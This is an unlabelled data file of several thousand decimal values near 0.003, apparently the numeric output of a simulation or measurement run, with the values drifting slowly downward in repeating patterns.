0.00313818
0.00313322
0.00314442
0.00314941
0.00314925
0.00314418
0.00314427
0.00314926
0.00314424
0.00313802
0.00313814
0.00313301
0.00313325
0.00313815
0.00313802
0.00313324
0.00314445
0.00314938
0.00314925
0.00314419
0.00314925
0.00314421
0.00314446
0.00313803
0.00313306
0.00313814
0.00313303
0.00313818
0.00313802
0.00313322
0.00314442
0.00314941
0.00314925
0.00314418
0.00314926
0.00314424
0.00314427
0.00313802
0.00313814
0.003133
0.00313325
0.00313815
0.00313802
0.00313324
0.0031606
0.00316029
0.00315563
0.00315563
0.00316049
0.00316049
0.00315551
0.00314426
0.00314472
0.00314921
0.00314921
0.00314439
0.00314932
0.00314438
0.00316053
0.00316065
0.00315546
0.00315571
0.00316065
0.00316054
0.0031557
0.00316698
0.00317186
0.00317203
0.00316673
0.00316679
0.00317187
0.00316683
0.00316701
0.00316674
0.00317199
0.00317187
0.00316676
0.00317186
0.00316702
0.00316054
0.00315549
0.00316065
0.00315552
0.00316069
0.00316053
0.00315568
0.00316053
0.00316065
0.00315571
0.00315546
0.00316054
0.00316065
0.0031557
0.00316698
0.00317186
0.00317203
0.00316673
0.00317187
0.00316679
0.00316683
0.00316701
0.00316674
0.00317187
0.00317199
0.00317186
0.00316702
0.00316676
0.00316054
0.00315549
0.00316065
0.00315552
0.00316069
0.00315568
0.00316053
0.00314445
0.00314938
0.00314925
0.00314419
0.00314925
0.00314421
0.00314446
0.00313803
0.00313306
0.00313814
0.00313303
0.00313802
0.00313818
0.00313322
0.00314442
0.00314941
0.00314925
0.00314418
0.00314427
0.00314926
0.00314424
0.00313802
0.00313814
0.003133
0.00313325
0.00313815
0.00313802
0.00313324
0.00314445
0.00314925
0.00314938
0.00314419
0.00314925
0.00314446
0.00314421
0.00313803
0.00313306
0.00313814
0.00313303
0.00313818
0.00313802
0.00313321
0.00314442
0.00314941
0.00314925
0.00314418
0.00314926
0.00314423
0.00314427
0.00313802
0.00313814
0.00313325
0.003133
0.00313802
0.00313815
0.00313324
0.00316053
0.00316065
0.00315571
0.00315546
0.00316054
0.00316065
0.0031557
0.00316698
0.00317186
0.00317203
0.00316673
0.00316683
0.00317187
0.00316679
0.00316701
0.00316674
0.00317187
0.00317199
0.00316702
0.00317186
0.00316676
0.00316054
0.00315549
0.00316065
0.00315552
0.00316053
0.00316069
0.00315568
0.00314445
0.00314938
0.00314925
0.00314419
0.00314925
0.00314421
0.00314446
0.00313803
0.00313306
0.00313814
0.00313303
0.00313321
0.00313802
0.00313818
0.00314442
0.00314941
0.00314925
0.00314418
0.00314926
0.00314427
0.00314424
0.00313802
0.00313813
0.003133
0.00313325
0.00313324
0.00313815
0.00313802
0.00314445
0.00314925
0.00314937
0.00314419
0.00314925
0.00314446
0.00314421
0.00313803
0.00313306
0.00313814
0.00313303
0.00313818
0.00313802
0.00313321
0.00314442
0.00314941
0.00314925
0.00314418
0.00314926
0.00314423
0.00314427
0.00313802
0.00313813
0.00313325
0.003133
0.00313802
0.00313815
0.00313324
0.0031606
0.00316029
0.00315563
0.00315562
0.00316049
0.00316049
0.00315551
0.00314426
0.00314472
0.00314921
0.00314921
0.00314438
0.00314932
0.00314437
0.00316053
0.00316065
0.00315571
0.00315545
0.00316054
0.00316065
0.0031557
0.00316698
0.00317186
0.00317203
0.00316673
0.00316683
0.00317187
0.00316679
0.00316701
0.00316674
0.00317187
0.00317199
0.00316702
0.00317186
0.00316676
0.00316054
0.00315549
0.00316065
0.00315552
0.00316053
0.00316069
0.00315568
0.00314445
0.00314925
0.00314938
0.00314419
0.00314925
0.00314446
0.00314421
0.00313803
0.00313306
0.00313814
0.00313303
0.00313321
0.00313802
0.00313818
0.00314442
0.00314941
0.00314925
0.00314418
0.00314926
0.00314427
0.00314423
0.00313802
0.00313813
0.00313325
0.003133
0.00313324
0.00313802
0.00313815
0.00314445
0.00314925
0.00314938
0.00314419
0.00314925
0.00314446
0.0031442
0.00313803
0.00313306
0.00313814
0.00313303
0.00313818
0.00313802
0.00313321
0.00314442
0.00314941
0.00314925
0.00314418
0.00314926
0.00314423
0.00314427
0.00313802
0.00313813
0.00313325
0.003133
0.00313802
0.00313815
0.00313324
0.00314426
0.00314472
0.00314921
0.00314921
0.00314932
0.00314438
0.00314437
0.00311578
0.00311547
0.00311092
0.00311091
0.0031108
0.00311567
0.00311567
0.00309974
0.00310016
0.00310457
0.00310457
0.00310469
0.00309985
0.00309984
0.0031157
0.00311582
0.00311074
0.00311097
0.00311583
0.0031157
0.00311096
0.00312206
0.00312684
0.003127
0.00312182
0.00312188
0.00312685
0.0031219
0.00312208
0.00312183
0.00312697
0.00312684
0.00312185
0.00312684
0.00312209
0.00311571
0.00311076
0.00311583
0.00311079
0.00311586
0.0031157
0.00311094
0.0031157
0.00311582
0.00311074
0.00311097
0.00311583
0.0031157
0.00311096
0.00312205
0.00312684
0.003127
0.00312182
0.00312685
0.00312188
0.0031219
0.00312208
0.00312183
0.00312697
0.00312684
0.00312683
0.00312185
0.00312209
0.00311571
0.00311076
0.00311582
0.00311078
0.00311586
0.00311094
0.0031157
0.00309988
0.00310474
0.0031046
0.00309965
0.0031046
0.00309967
0.00309989
0.00309356
0.00308867
0.00309368
0.00308866
0.00309356
0.00309371
0.00308883
0.00309986
0.00310477
0.00310461
0.00309964
0.00309971
0.00310462
0.00309969
0.00309355
0.00309367
0.00308864
0.00308886
0.00309368
0.00309355
0.00308885
0.00309988
0.00310474
0.0031046
0.00309965
0.0031046
0.00309967
0.00309989
0.00309356
0.00308867
0.00309367
0.00308866
0.00309371
0.00309355
0.00308883
0.00309986
0.00310476
0.00310461
0.00309963
0.00310461
0.00309969
0.00309971
0.00309355
0.00309367
0.00308864
0.00308886
0.00309368
0.00309355
0.00308885
0.00311578
0.00311547
0.00311092
0.00311091
0.00311567
0.00311567
0.0031108
0.00309973
0.00310016
0.00310457
0.00310457
0.00309985
0.00310468
0.00309984
0.0031157
0.00311582
0.00311074
0.00311097
0.00311583
0.0031157
0.00311096
0.00312205
0.00312684
0.003127
0.00312182
0.00312188
0.00312685
0.0031219
0.00312208
0.00312183
0.00312697
0.00312684
0.00312185
0.00312683
0.00312209
0.00311571
0.00311076
0.00311582
0.00311078
0.00311586
0.0031157
0.00311094
0.0031157
0.00311582
0.00311097
0.00311074
0.0031157
0.00311583
0.00311096
0.00312205
0.00312684
0.003127
0.00312182
0.00312685
0.00312188
0.0031219
0.00312208
0.00312183
0.00312684
0.00312697
0.00312683
0.00312209
0.00312185
0.00311571
0.00311076
0.00311582
0.00311078
0.00311586
0.00311094
0.0031157
0.00309988
0.00310474
0.0031046
0.00309965
0.0031046
0.00309967
0.00309989
0.00309356
0.00308867
0.00309367
0.00308866
0.00309356
0.00309371
0.00308883
0.00309986
0.00310476
0.00310461
0.00309963
0.00309971
0.00310462
0.00309969
0.00309355
0.00309367
0.00308864
0.00308886
0.00309368
0.00309355
0.00308885
0.00309988
0.0031046
0.00310474
0.00309965
0.0031046
0.00309989
0.00309967
0.00309356
0.00308867
0.00309367
0.00308866
0.00309371
0.00309355
0.00308883
0.00309986
0.00310476
0.00310461
0.00309963
0.00310461
0.00309969
0.00309971
0.00309355
0.00309367
0.00308886
0.00308864
0.00309355
0.00309368
0.00308885
0.0031157
0.00311581
0.00311097
0.00311074
0.0031157
0.00311583
0.00311096
0.00312205
0.00312684
0.003127
0.00312182
0.0031219
0.00312685
0.00312187
0.00312208
0.00312183
0.00312684
0.00312696
0.00312208
0.00312683
0.00312185
0.00311571
0.00311076
0.00311582
0.00311078
0.0031157
0.00311586
0.00311094
0.00309988
0.00310473
0.0031046
0.00309965
0.0031046
0.00309967
0.00309989
0.00309356
0.00308867
0.00309367
0.00308866
0.00308883
0.00309355
0.00309371
0.00309986
0.00310476
0.00310461
0.00309963
0.00310461
0.00309971
0.00309969
0.00309355
0.00309367
0.00308864
0.00308886
0.00308885
0.00309368
0.00309355
0.00309988
0.0031046
0.00310474
0.00309965
0.0031046
0.00309989
0.00309967
0.00309356
0.00308867
0.00309367
0.00308866
0.00309371
0.00309355
0.00308883
0.00309986
0.00310476
0.00310461
0.00309963
0.00310461
0.00309969
0.00309971
0.00309355
0.00309367
0.00308886
0.00308864
0.00309355
0.00309368
0.00308885
0.00311578
0.00311547
0.00311092
0.00311091
0.00311567
0.00311567
0.0031108
0.00309973
0.00310016
0.00310457
0.00310457
0.00309984
0.00310468
0.00309984
0.0031157
0.00311581
0.00311097
0.00311074
0.0031157
0.00311583
0.00311096
0.00312205
0.00312684
0.003127
0.00312182
0.0031219
0.00312685
0.00312187
0.00312208
0.00312183
0.00312684
0.00312696
0.00312208
0.00312683
0.00312185
0.00311571
0.00311076
0.00311582
0.00311078
0.0031157
0.00311586
0.00311094
0.00309988
0.0031046
0.00310473
0.00309965
0.0031046
0.00309989
0.00309967
0.00309356
0.00308867
0.00309367
0.00308866
0.00308883
0.00309355
0.00309371
0.00309986
0.00310476
0.00310461
0.00309963
0.00310461
0.00309971
0.00309969
0.00309355
0.00309367
0.00308885
0.00308864
0.00308885
0.00309355
0.00309368
0.00309988
0.0031046
0.00310473
0.00309965
0.0031046
0.00309989
0.00309967
0.00309356
0.00308867
0.00309367
0.00308866
0.00309371
0.00309355
0.00308883
0.00309986
0.00310476
0.00310461
0.00309963
0.00310461
0.00309969
0.00309971
0.00309355
0.00309367
0.00308885
0.00308864
0.00309355
0.00309368
0.00308885
0.00309973
0.00310016
0.00310457
0.00310457
0.00310468
0.00309984
0.00309984
0.00307163
0.00307133
0.00306686
0.00306686
0.00306676
0.00307152
0.00307152
0.00305584
0.00305623
0.00306058
0.00306058
0.00306069
0.00305594
0.00305594
0.00307155
0.00307168
0.00306669
0.0030669
0.00307169
0.00307156
0.00306689
0.00307783
0.00308254
0.00308269
0.0030776
0.00307766
0.00308254
0.00307767
0.00307785
0.00307763
0.00308267
0.00308253
0.00307765
0.00308253
0.00307786
0.00307156
0.0030667
0.00307168
0.00306671
0.00307171
0.00307156
0.00306687
0.00307155
0.00307168
0.00306669
0.0030669
0.00307169
0.00307156
0.00306689
0.00307783
0.00308254
0.00308269
0.0030776
0.00308254
0.00307766
0.00307767
0.00307785
0.00307763
0.00308267
0.00308253
0.00308253
0.00307765
0.00307786
0.00307156
0.0030667
0.00307168
0.00306671
0.00307171
0.00306687
0.00307156
0.00305596
0.00306075
0.00306061
0.00305575
0.00306061
0.00305577
0.00305597
0.00304971
0.00304489
0.00304982
0.00304489
0.00304971
0.00304985
0.00304505
0.00305594
0.00306076
0.00306062
0.00305572
0.00305578
0.00306062
0.00305578
0.0030497
0.00304983
0.00304488
0.00304508
0.00304984
0.0030497
0.00304507
0.00305596
0.00306075
0.00306061
0.00305575
0.00306061
0.00305577
0.00305597
0.00304971
0.00304489
0.00304982
0.00304489
0.00304985
0.00304971
0.00304505
0.00305594
0.00306076
0.00306062
0.00305572
0.00306062
0.00305578
0.00305578
0.0030497
0.00304983
0.00304488
0.00304508
0.00304984
0.0030497
0.00304507
0.00307163
0.00307133
0.00306686
0.00306686
0.00307152
0.00307152
0.00306676
0.00305584
0.00305623
0.00306058
0.00306058
0.00305594
0.00306069
0.00305594
0.00307155
0.00307168
0.00306669
0.0030669
0.00307169
0.00307156
0.00306689
0.00307783
0.00308254
0.00308269
0.0030776
0.00307766
0.00308254
0.00307767
0.00307785
0.00307763
0.00308267
0.00308253
0.00307765
0.00308253
0.00307786
0.00307156
0.0030667
0.00307168
0.00306671
0.00307171
0.00307156
0.00306687
0.00307155
0.00307168
0.0030669
0.00306669
0.00307156
0.00307169
0.00306689
0.00307783
0.00308254
0.00308269
0.0030776
0.00308254
0.00307766
0.00307767
0.00307785
0.00307763
0.00308253
0.00308267
0.00308253
0.00307786
0.00307765
0.00307156
0.0030667
0.00307168
0.00306671
0.00307171
0.00306687
0.00307156
0.00305596
0.00306075
0.00306061
0.00305575
0.00306061
0.00305577
0.00305597
0.00304971
0.00304489
0.00304982
0.00304489
0.00304971
0.00304985
0.00304505
0.00305594
0.00306076
0.00306062
0.00305572
0.00305578
0.00306062
0.00305578
0.0030497
0.00304983
0.00304488
0.00304508
0.00304984
0.0030497
0.00304507
0.00305596
0.00306061
0.00306075
0.00305575
0.00306061
0.00305597
0.00305577
0.00304971
0.00304489
0.00304982
0.00304489
0.00304985
0.00304971
0.00304505
0.00305594
0.00306076
0.00306062
0.00305572
0.00306062
0.00305578
0.00305578
0.0030497
0.00304983
0.00304508
0.00304488
0.0030497
0.00304984
0.00304507
0.00307155
0.00307168
0.0030669
0.00306669
0.00307156
0.00307169
0.00306689
0.00307783
0.00308254
0.00308269
0.0030776
0.00307767
0.00308254
0.00307766
0.00307785
0.00307763
0.00308253
0.00308267
0.00307786
0.00308253
0.00307765
0.00307156
0.0030667
0.00307168
0.00306671
0.00307156
0.00307171
0.00306687
0.00305596
0.00306075
0.00306061
0.00305575
0.00306061
0.00305577
0.00305597
0.00304971
0.00304489
0.00304982
0.00304489
0.00304505
0.00304971
0.00304985
0.00305594
0.00306076
0.00306062
0.00305572
0.00306062
0.00305578
0.00305578
0.0030497
0.00304983
0.00304488
0.00304508
0.00304507
0.00304984
0.0030497
0.00305596
0.00306061
0.00306075
0.00305575
0.00306061
0.00305597
0.00305577
0.00304971
0.00304489
0.00304982
0.00304489
0.00304985
0.00304971
0.00304505
0.00305594
0.00306076
0.00306062
0.00305572
0.00306062
0.00305578
0.00305579
0.0030497
0.00304983
0.00304508
0.00304488
0.00304971
0.00304984
0.00304507
0.00307163
0.00307133
0.00306686
0.00306686
0.00307152
0.00307152
0.00306676
0.00305584
0.00305623
0.00306058
0.00306058
0.00305594
0.00306069
0.00305594
0.00307155
0.00307168
0.0030669
0.00306669
0.00307156
0.00307169
0.00306689
0.00307783
0.00308254
0.00308269
0.0030776
0.00307767
0.00308254
0.00307766
0.00307785
0.00307763
0.00308253
0.00308267
0.00307786
0.00308253
0.00307765
0.00307156
0.0030667
0.00307168
0.00306671
0.00307156
0.00307171
0.00306687
0.00305596
0.00306061
0.00306075
0.00305575
0.00306061
0.00305597
0.00305577
0.00304971
0.00304489
0.00304982
0.00304489
0.00304505
0.00304971
0.00304985
0.00305594
0.00306076
0.00306062
0.00305572
0.00306062
0.00305578
0.00305578
0.0030497
0.00304983
0.00304508
0.00304488
0.00304507
0.00304971
0.00304984
0.00305596
0.00306061
0.00306075
0.00305575
0.00306061
0.00305597
0.00305577
0.00304971
0.00304489
0.00304982
0.00304489
0.00304985
0.00304971
0.00304505
0.00305594
0.00306076
0.00306062
0.00305572
0.00306062
0.00305578
0.00305578
0.0030497
0.00304983
0.00304508
0.00304488
0.00304971
0.00304984
0.00304507
0.00305584
0.00305623
0.00306058
0.00306058
0.00306069
0.00305594
0.00305593
0.00302806
0.00302776
0.00302337
0.00302337
0.00302327
0.00302795
0.00302795
0.00301248
0.00301284
0.00301714
0.00301714
0.00301725
0.00301257
0.00301257
0.00302798
0.00302811
0.00302321
0.00302339
0.00302813
0.00302799
0.00302338
0.00303419
0.00303883
0.00303898
0.00303396
0.00303403
0.00303884
0.00303403
0.00303421
0.00303401
0.00303897
0.00303883
0.00303403
0.00303883
0.00303422
0.00302799
0.0030232
0.0030281
0.0030232
0.00302813
0.00302799
0.00302336
0.00302798
0.00302812
0.00302321
0.00302339
0.00302813
0.00302799
0.00302338
0.00303419
0.00303883
0.00303897
0.00303396
0.00303883
0.00303403
0.00303403
0.00303421
0.00303401
0.00303897
0.00303883
0.00303883
0.00303403
0.00303422
0.00302799
0.0030232
0.0030281
0.0030232
0.00302813
0.00302336
0.00302799
0.00301259
0.00301732
0.00301717
0.0030124
0.00301717
0.00301241
0.0030126
0.0030064
0.00300164
0.0030065
0.00300164
0.0030064
0.00300653
0.0030018
0.00301257
0.00301732
0.00301718
0.00301234
0.0030124
0.00301718
0.00301241
0.00300639
0.00300653
0.00300165
0.00300183
0.00300654
0.00300639
0.00300182
0.00301259
0.00301732
0.00301717
0.0030124
0.00301717
0.00301241
0.0030126
0.0030064
0.00300164
0.0030065
0.00300164
0.00300653
0.0030064
0.0030018
0.00301257
0.00301732
0.00301718
0.00301234
0.00301718
0.00301241
0.0030124
0.00300639
0.00300653
0.00300165
0.00300183
0.00300654
0.00300639
0.00300182
0.00302806
0.00302776
0.00302337
0.00302337
0.00302795
0.00302795
0.00302327
0.00301248
0.00301284
0.00301714
0.00301714
0.00301258
0.00301725
0.00301258
0.00302798
0.00302811
0.00302321
0.00302339
0.00302813
0.00302799
0.00302338
0.00303419
0.00303883
0.00303898
0.00303396
0.00303403
0.00303884
0.00303403
0.00303421
0.00303401
0.00303897
0.00303883
0.00303403
0.00303883
0.00303422
0.00302799
0.0030232
0.0030281
0.0030232
0.00302813
0.00302799
0.00302336
0.00302798
0.00302812
0.00302339
0.00302321
0.00302799
0.00302813
0.00302338
0.00303419
0.00303883
0.00303898
0.00303396
0.00303884
0.00303403
0.00303403
0.00303421
0.00303401
0.00303883
0.00303897
0.00303883
0.00303422
0.00303403
0.00302799
0.0030232
0.0030281
0.0030232
0.00302813
0.00302336
0.00302799
0.00301259
0.00301732
0.00301717
0.0030124
0.00301717
0.00301241
0.0030126
0.0030064
0.00300164
0.0030065
0.00300164
0.0030064
0.00300653
0.0030018
0.00301257
0.00301732
0.00301718
0.00301234
0.00301241
0.00301718
0.00301241
0.00300639
0.00300653
0.00300165
0.00300183
0.00300654
0.00300639
0.00300182
0.00301259
0.00301717
0.00301732
0.0030124
0.00301717
0.0030126
0.00301241
0.0030064
0.00300164
0.0030065
0.00300164
0.00300653
0.0030064
0.0030018
0.00301257
0.00301732
0.00301718
0.00301234
0.00301718
0.00301241
0.00301241
0.00300639
0.00300653
0.00300183
0.00300165
0.00300639
0.00300654
0.00300182
0.00302798
0.00302812
0.00302339
0.00302321
0.00302799
0.00302813
0.00302338
0.00303419
0.00303884
0.00303898
0.00303396
0.00303403
0.00303884
0.00303403
0.00303421
0.00303401
0.00303883
0.00303897
0.00303422
0.00303883
0.00303403
0.00302799
0.0030232
0.0030281
0.0030232
0.00302799
0.00302813
0.00302336
0.00301259
0.00301732
0.00301717
0.0030124
0.00301717
0.00301242
0.0030126
0.0030064
0.00300164
0.0030065
0.00300164
0.0030018
0.0030064
0.00300653
0.00301257
0.00301732
0.00301718
0.00301234
0.00301718
0.00301241
0.00301241
0.00300639
0.00300653
0.00300165
0.00300183
0.00300182
0.00300654
0.00300639
0.00301259
0.00301717
0.00301732
0.0030124
0.00301717
0.0030126
0.00301241
0.0030064
0.00300164
0.0030065
0.00300164
0.00300653
0.0030064
0.0030018
0.00301257
0.00301732
0.00301718
0.00301234
0.00301718
0.00301241
0.0030124
0.00300639
0.00300653
0.00300183
0.00300165
0.00300639
0.00300654
0.00300182
0.00302806
0.00302776
0.00302337
0.00302337
0.00302795
0.00302795
0.00302328
0.00301248
0.00301284
0.00301714
0.00301714
0.00301257
0.00301725
0.00301258
0.00302798
0.00302812
0.00302339
0.00302321
0.00302799
0.00302813
0.00302338
0.00303419
0.00303883
0.00303898
0.00303396
0.00303403
0.00303884
0.00303403
0.00303421
0.00303401
0.00303883
0.00303897
0.00303422
0.00303883
0.00303403
0.00302799
0.0030232
0.0030281
0.0030232
0.00302799
0.00302813
0.00302336
0.00301259
0.00301717
0.00301732
0.0030124
0.00301717
0.0030126
0.00301242
0.0030064
0.00300164
0.0030065
0.00300164
0.0030018
0.0030064
0.00300653
0.00301257
0.00301732
0.00301718
0.00301234
0.00301718
0.00301241
0.00301241
0.00300639
0.00300653
0.00300183
0.00300165
0.00300182
0.00300639
0.00300654
0.00301259
0.00301717
0.00301732
0.0030124
0.00301717
0.0030126
0.00301241
0.0030064
0.00300164
0.0030065
0.00300164
0.00300653
0.0030064
0.0030018
0.00301257
0.00301732
0.00301718
0.00301234
0.00301718
0.00301241
0.00301241
0.00300639
0.00300653
0.00300183
0.00300165
0.00300639
0.00300654
0.00300182
0.00301248
0.00301284
0.00301714
0.00301714
0.00301725
0.00301257
0.00301258
0.00298498
0.00298469
0.00298037
0.00298037
0.00298028
0.00298488
0.00298488
0.0029696
0.00296993
0.00297418
0.00297418
0.00297429
0.0029697
0.00296969
0.00298491
0.00298505
0.00298021
0.00298038
0.00298506
0.00298492
0.00298037
0.00299106
0.00299565
0.00299578
0.00299083
0.0029909
0.00299564
0.0029909
0.00299108
0.0029909
0.00299578
0.00299564
0.00299092
0.00299564
0.00299109
0.00298492
0.0029802
0.00298502
0.00298019
0.00298505
0.00298492
0.00298035
0.00298491
0.00298505
0.00298021
0.00298038
0.00298506
0.00298492
0.00298037
0.00299106
0.00299565
0.00299578
0.00299083
0.00299564
0.0029909
0.0029909
0.00299108
0.0029909
0.00299579
0.00299564
0.00299564
0.00299092
0.00299109
0.00298492
0.0029802
0.00298502
0.00298019
0.00298505
0.00298035
0.00298492
0.00296969
0.00297437
0.00297422
0.00296952
0.00297422
0.00296954
0.0029697
0.00296356
0.00295886
0.00296366
0.00295886
0.00296356
0.00296369
0.00295902
0.00296967
0.00297435
0.00297423
0.00296944
0.00296951
0.00297423
0.00296952
0.00296355
0.0029637
0.00295889
0.00295905
0.0029637
0.00296356
0.00295904
0.00296969
0.00297437
0.00297422
0.00296952
0.00297422
0.00296954
0.0029697
0.00296356
0.00295886
0.00296366
0.00295886
0.00296369
0.00296356
0.00295902
0.00296967
0.00297435
0.00297423
0.00296944
0.00297423
0.00296952
0.00296951
0.00296355
0.0029637
0.00295889
0.00295905
0.0029637
0.00296356
0.00295904
0.00298498
0.00298469
0.00298037
0.00298037
0.00298487
0.00298488
0.00298028
0.0029696
0.00296993
0.00297418
0.00297418
0.00296969
0.00297429
0.00296969
0.00298491
0.00298505
0.00298021
0.00298038
0.00298506
0.00298492
0.00298037
0.00299106
0.00299565
0.00299578
0.00299083
0.0029909
0.00299565
0.0029909
0.00299108
0.0029909
0.00299579
0.00299564
0.00299092
0.00299564
0.00299109
0.00298492
0.0029802
0.00298502
0.00298019
0.00298505
0.00298492
0.00298035
0.00298491
0.00298505
0.00298038
0.00298021
0.00298492
0.00298506
0.00298037
0.00299106
0.00299565
0.00299578
0.00299083
0.00299564
0.0029909
0.0029909
0.00299108
0.0029909
0.00299564
0.00299579
0.00299564
0.00299109
0.00299092
0.00298492
0.0029802
0.00298502
0.00298019
0.00298505
0.00298035
0.00298492
0.00296969
0.00297437
0.00297422
0.00296952
0.00297422
0.00296954
0.0029697
0.00296356
0.00295886
0.00296366
0.00295886
0.00296356
0.00296369
0.00295902
0.00296967
0.00297436
0.00297423
0.00296944
0.00296951
0.00297423
0.00296952
0.00296355
0.0029637
0.00295889
0.00295905
0.0029637
0.00296356
0.00295904
0.00296969
0.00297422
0.00297437
0.00296952
0.00297422
0.0029697
0.00296954
0.00296356
0.00295886
0.00296366
0.00295886
0.00296369
0.00296356
0.00295902
0.00296967
0.00297436
0.00297423
0.00296944
0.00297423
0.00296952
0.00296951
0.00296355
0.0029637
0.00295905
0.00295889
0.00296356
0.0029637
0.00295904
0.00298491
0.00298505
0.00298038
0.00298021
0.00298492
0.00298506
0.00298037
0.00299106
0.00299565
0.00299578
0.00299083
0.0029909
0.00299565
0.0029909
0.00299108
0.0029909
0.00299564
0.00299579
0.00299109
0.00299564
0.00299092
0.00298492
0.0029802
0.00298502
0.00298019
0.00298492
0.00298505
0.00298035
0.00296969
0.00297437
0.00297422
0.00296952
0.00297422
0.00296954
0.0029697
0.00296356
0.00295886
0.00296366
0.00295886
0.00295902
0.00296356
0.00296369
0.00296967
0.00297436
0.00297423
0.00296944
0.00297423
0.00296951
0.00296952
0.00296355
0.0029637
0.00295889
0.00295905
0.00295904
0.0029637
0.00296356
0.00296969
0.00297422
0.00297437
0.00296952
0.00297422
0.0029697
0.00296954
0.00296356
0.00295886
0.00296366
0.00295886
0.00296369
0.00296356
0.00295902
0.00296967
0.00297435
0.00297423
0.00296944
0.00297423
0.00296952
0.00296951
0.00296355
0.00296369
0.00295905
0.00295889
0.00296356
0.0029637
0.00295904
0.00298498
0.00298469
0.00298037
0.00298037
0.00298487
0.00298488
0.00298028
0.0029696
0.00296993
0.00297418
0.00297418
0.0029697
0.00297429
0.00296969
0.00298491
0.00298505
0.00298038
0.00298021
0.00298492
0.00298506
0.00298037
0.00299106
0.00299565
0.00299578
0.00299083
0.0029909
0.00299565
0.00299091
0.00299108
0.0029909
0.00299564
0.00299579
0.00299109
0.00299564
0.00299092
0.00298492
0.0029802
0.00298502
0.00298019
0.00298492
0.00298505
0.00298035
0.00296969
0.00297422
0.00297437
0.00296952
0.00297422
0.0029697
0.00296954
0.00296356
0.00295886
0.00296366
0.00295886
0.00295902
0.00296356
0.00296369
0.00296967
0.00297436
0.00297423
0.00296944
0.00297423
0.00296951
0.00296952
0.00296355
0.0029637
0.00295905
0.00295889
0.00295904
0.00296356
0.0029637
0.00296969
0.00297422
0.00297437
0.00296952
0.00297422
0.0029697
0.00296954
0.00296356
0.00295886
0.00296366
0.00295886
0.00296369
0.00296356
0.00295902
0.00296967
0.00297436
0.00297423
0.00296944
0.00297423
0.00296952
0.00296951
0.00296355
0.0029637
0.00295905
0.00295889
0.00296356
0.0029637
0.00295904
0.0029696
0.00296993
0.00297418
0.00297418
0.00297429
0.00296969
0.00296969
0.00294236
0.00294208
0.00293782
0.00293781
0.00293773
0.00294225
0.00294225
0.00292715
0.00292749
0.00293167
0.00293166
0.00293177
0.00292725
0.00292724
0.0029423
0.00294245
0.00293767
0.00293782
0.00294245
0.0029423
0.00293782
0.00294839
0.00295292
0.00295304
0.00294816
0.00294824
0.00295292
0.00294823
0.00294841
0.00294825
0.00295306
0.00295292
0.00294826
0.00295291
0.00294842
0.0029423
0.00293764
0.0029424
0.00293763
0.00294243
0.00294231
0.00293779
0.0029423
0.00294245
0.00293767
0.00293782
0.00294245
0.0029423
0.00293782
0.00294839
0.00295292
0.00295304
0.00294816
0.00295292
0.00294824
0.00294823
0.00294841
0.00294825
0.00295306
0.00295292
0.00295291
0.00294826
0.00294842
0.0029423
0.00293764
0.0029424
0.00293763
0.00294243
0.00293779
0.00294231
0.00292724
0.00293186
0.00293172
0.00292709
0.00293171
0.0029271
0.00292725
0.00292116
0.00291651
0.00292125
0.00291652
0.00292117
0.00292128
0.00291667
0.00292722
0.00293184
0.00293173
0.00292698
0.00292706
0.00293172
0.00292706
0.00292115
0.0029213
0.00291655
0.0029167
0.00292131
0.00292116
0.0029167
0.00292724
0.00293186
0.00293172
0.00292709
0.00293171
0.0029271
0.00292725
0.00292116
0.00291651
0.00292125
0.00291652
0.00292128
0.00292117
0.00291667
0.00292722
0.00293184
0.00293173
0.00292698
0.00293172
0.00292707
0.00292706
0.00292115
0.0029213
0.00291655
0.0029167
0.00292131
0.00292116
0.0029167
0.00294236
0.00294208
0.00293782
0.00293781
0.00294225
0.00294225
0.00293773
0.00292715
0.00292749
0.00293167
0.00293166
0.00292725
0.00293177
0.00292724
0.0029423
0.00294245
0.00293767
0.00293782
0.00294245
0.0029423
0.00293781
0.00294839
0.00295292
0.00295304
0.00294816
0.00294824
0.00295292
0.00294823
0.00294841
0.00294825
0.00295306
0.00295292
0.00294826
0.00295291
0.00294842
0.0029423
0.00293764
0.0029424
0.00293763
0.00294243
0.00294231
0.00293779
0.0029423
0.00294245
0.00293782
0.00293767
0.0029423
0.00294245
0.00293781
0.00294839
0.00295292
0.00295304
0.00294816
0.00295292
0.00294824
0.00294823
0.00294841
0.00294825
0.00295292
0.00295306
0.00295291
0.00294842
0.00294826
0.0029423
0.00293764
0.0029424
0.00293763
0.00294243
0.00293779
0.00294231
0.00292724
0.00293186
0.00293172
0.00292709
0.00293171
0.0029271
0.00292725
0.00292116
0.00291651
0.00292125
0.00291652
0.00292116
0.00292128
0.00291667
0.00292722
0.00293184
0.00293172
0.00292698
0.00292706
0.00293172
0.00292706
0.00292115
0.0029213
0.00291655
0.0029167
0.0029213
0.00292116
0.00291669
0.00292724
0.00293172
0.00293186
0.00292709
0.00293171
0.00292725
0.0029271
0.00292116
0.00291651
0.00292125
0.00291652
0.00292128
0.00292117
0.00291667
0.00292722
0.00293184
0.00293172
0.00292698
0.00293172
0.00292706
0.00292706
0.00292115
0.0029213
0.0029167
0.00291655
0.00292116
0.0029213
0.00291669
0.0029423
0.00294245
0.00293782
0.00293767
0.0029423
0.00294245
0.00293781
0.00294839
0.00295292
0.00295304
0.00294816
0.00294823
0.00295292
0.00294824
0.00294841
0.00294825
0.00295292
0.00295306
0.00294842
0.00295291
0.00294826
0.0029423
0.00293764
0.0029424
0.00293763
0.00294231
0.00294243
0.00293779
0.00292724
0.00293186
0.00293172
0.00292709
0.00293171
0.0029271
0.00292725
0.00292116
0.00291651
0.00292125
0.00291652
0.00291667
0.00292117
0.00292128
0.00292722
0.00293184
0.00293173
0.00292698
0.00293172
0.00292706
0.00292706
0.00292115
0.0029213
0.00291655
0.0029167
0.0029167
0.0029213
0.00292116
0.00292724
0.00293172
0.00293186
0.00292709
0.00293171
0.00292725
0.0029271
0.00292116
0.00291651
0.00292125
0.00291652
0.00292128
0.00292117
0.00291667
0.00292722
0.00293184
0.00293173
0.00292698
0.00293172
0.00292706
0.00292706
0.00292115
0.0029213
0.0029167
0.00291655
0.00292116
0.0029213
0.00291669
0.00294236
0.00294208
0.00293782
0.00293781
0.00294225
0.00294225
0.00293773
0.00292715
0.00292748
0.00293167
0.00293166
0.00292725
0.00293177
0.00292724
0.0029423
0.00294245
0.00293782
0.00293767
0.0029423
0.00294245
0.00293781
0.00294839
0.00295292
0.00295304
0.00294816
0.00294823
0.00295292
0.00294824
0.00294841
0.00294825
0.00295292
0.00295306
0.00294842
0.00295291
0.00294826
0.0029423
0.00293764
0.0029424
0.00293763
0.00294231
0.00294243
0.00293779
0.00292724
